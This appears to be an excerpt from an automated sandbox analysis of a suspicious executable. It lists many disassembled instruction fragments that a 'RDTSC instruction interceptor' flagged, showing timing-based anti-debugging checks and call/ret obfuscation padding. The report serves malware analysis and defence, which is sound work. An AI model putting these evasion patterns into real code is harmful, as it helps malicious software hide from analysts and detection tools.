                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5D8A5 second address: B5D967 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0704B3554Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F0704B35538h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007F0704B35538h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 jnl 00007F0704B3553Bh 0x00000047 jns 00007F0704B35537h 0x0000004d push 00000000h 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007F0704B35538h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 00000018h 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 mov di, 23F7h 0x0000006d jmp 00007F0704B35542h 0x00000072 xchg eax, ebx 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F0704B3553Eh 0x0000007a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5D967 second address: B5D971 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0704B3A496h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5D971 second address: B5D983 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0704B35536h 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5EBF6 second address: B5EBFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5F8B6 second address: B5F8D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3553Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0704B35540h 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B5F8D7 second address: B5F961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0704B3A4A7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F0704B3A498h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jno 00007F0704B3A49Eh 0x0000002e sub dword ptr [ebp+122D2F1Fh], edx 0x00000034 or di, 2100h 0x00000039 push 00000000h 0x0000003b mov esi, 282F8DCAh 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007F0704B3A498h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c movsx edi, dx 0x0000005f xchg eax, ebx 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 jng 00007F0704B3A496h 0x00000069 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B603EA second address: B603F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0704B3553Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B603F9 second address: B6040B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jbe 00007F0704B3A4A0h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6040B second address: B6046E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 call 00007F0704B3553Ch 0x0000000c mov edi, dword ptr [ebp+122D397Bh] 0x00000012 pop esi 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F0704B35538h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 xchg eax, ebx 0x00000032 ja 00007F0704B35542h 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F0704B3553Dh 0x00000040 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6046E second address: B60478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F0704B3A496h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B63A3F second address: B63A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B64C4B second address: B64C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B64C51 second address: B64C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B63BAF second address: B63BB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B64C55 second address: B64CC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jne 00007F0704B35554h 0x0000000f nop 0x00000010 jo 00007F0704B3553Ch 0x00000016 mov dword ptr [ebp+122D2151h], ecx 0x0000001c or dword ptr [ebp+1244FC7Eh], ebx 0x00000022 push 00000000h 0x00000024 mov bh, 46h 0x00000026 push 00000000h 0x00000028 jmp 00007F0704B3553Ch 0x0000002d sbb ebx, 1D46D466h 0x00000033 xchg eax, esi 0x00000034 jmp 00007F0704B35542h 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B64DD2 second address: B64DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0704B3A4A3h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B64DE9 second address: B64DF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B64E8A second address: B64E8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B64E8F second address: B64EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0704B35541h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B65E7B second address: B65E80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B65E80 second address: B65E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F0704B35536h 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B67CD3 second address: B67CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B66DC3 second address: B66DCD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0704B35536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B66EC0 second address: B66EE1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0704B3A496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F0704B3A4A3h 0x00000014 jmp 00007F0704B3A49Dh 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B68F11 second address: B68F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6ADA1 second address: B6ADA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6ADA8 second address: B6ADFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F0704B35538h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov bh, CEh 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push ebx 0x00000029 call 00007F0704B35538h 0x0000002e pop ebx 0x0000002f mov dword ptr [esp+04h], ebx 0x00000033 add dword ptr [esp+04h], 00000015h 0x0000003b inc ebx 0x0000003c push ebx 0x0000003d ret 0x0000003e pop ebx 0x0000003f ret 0x00000040 sub ebx, dword ptr [ebp+122D205Ch] 0x00000046 push 00000000h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushad 0x0000004d popad 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6ADFF second address: B6AE04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6CD8C second address: B6CD9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3553Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6EC39 second address: B6EC95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D2702h], edx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F0704B3A498h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c sbb ebx, 6B3BE5D8h 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D2861h], edx 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jl 00007F0704B3A4A4h 0x00000043 jmp 00007F0704B3A49Eh 0x00000048 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6EC95 second address: B6ECB0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0704B35538h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0704B3553Ch 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6FB98 second address: B6FB9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6FB9C second address: B6FBB1 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0704B35536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F0704B3553Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6FBB1 second address: B6FBB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6FBB5 second address: B6FBBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0704B35536h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6FBBF second address: B6FC19 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D2411h], eax 0x0000000f push 00000000h 0x00000011 mov di, ax 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F0704B3A498h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 pushad 0x00000031 jmp 00007F0704B3A4A3h 0x00000036 jnc 00007F0704B3A498h 0x0000003c popad 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push ebx 0x00000042 pop ebx 0x00000043 pop eax 0x00000044 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6FC19 second address: B6FC20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6FC20 second address: B6FC2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6D053 second address: B6D05D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6BFB7 second address: B6BFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B6D05D second address: B6D061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B70B5D second address: B70B61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B70B61 second address: B70B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B70B65 second address: B70C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F0704B3A4A6h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F0704B3A498h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jnc 00007F0704B3A49Ch 0x00000031 mov edi, dword ptr [ebp+122D2A7Ah] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push eax 0x0000003c call 00007F0704B3A498h 0x00000041 pop eax 0x00000042 mov dword ptr [esp+04h], eax 0x00000046 add dword ptr [esp+04h], 0000001Ch 0x0000004e inc eax 0x0000004f push eax 0x00000050 ret 0x00000051 pop eax 0x00000052 ret 0x00000053 movsx ebx, dx 0x00000056 jmp 00007F0704B3A49Fh 0x0000005b xchg eax, esi 0x0000005c jmp 00007F0704B3A49Bh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B70C01 second address: B70C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B70C05 second address: B70C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B70C09 second address: B70C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B71B9B second address: B71BA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B72BFD second address: B72C0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B3553Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B72C0F second address: B72C22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0704B3A49Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B70D84 second address: B70DA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0704B35549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B70DA5 second address: B70DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7A65A second address: B7A681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F0704B3554Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F0704B35536h 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7EAFF second address: B7EB23 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0704B3A496h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007F0704B3A4A4h 0x00000014 pop ecx 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7EB23 second address: B7EB2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0704B35536h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7EB2D second address: B7EB31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7EB31 second address: B7EB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0704B35541h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7EB51 second address: B7EB76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0704B3A49Ah 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f jmp 00007F0704B3A49Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7EB76 second address: B7EB8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F0704B35536h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7EC1D second address: B7EC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e jmp 00007F0704B3A49Eh 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push ecx 0x00000019 jmp 00007F0704B3A4A7h 0x0000001e pop ecx 0x0000001f mov eax, dword ptr [eax] 0x00000021 push esi 0x00000022 push esi 0x00000023 push eax 0x00000024 pop eax 0x00000025 pop esi 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b push eax 0x0000002c pushad 0x0000002d jmp 00007F0704B3A4A7h 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7ECD9 second address: B7ECDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7ECDF second address: B7ECE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7ECE3 second address: B7ECE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7ECE7 second address: B7ED0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a jmp 00007F0704B3A4A1h 0x0000000f pop ecx 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 pop edi 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7ED0D second address: B7ED13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7ED13 second address: B7ED17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7ED17 second address: B7ED2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F0704B35536h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7ED2B second address: B7ED2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7ED2F second address: B7ED35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7EE13 second address: B7EE1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B7EE1C second address: B7EE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B814FF second address: B81504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeRDTSC instruction interceptor: First address: B81504 second address: B81518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0704B35536h 0x0000000a jo 00007F0704B35536h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
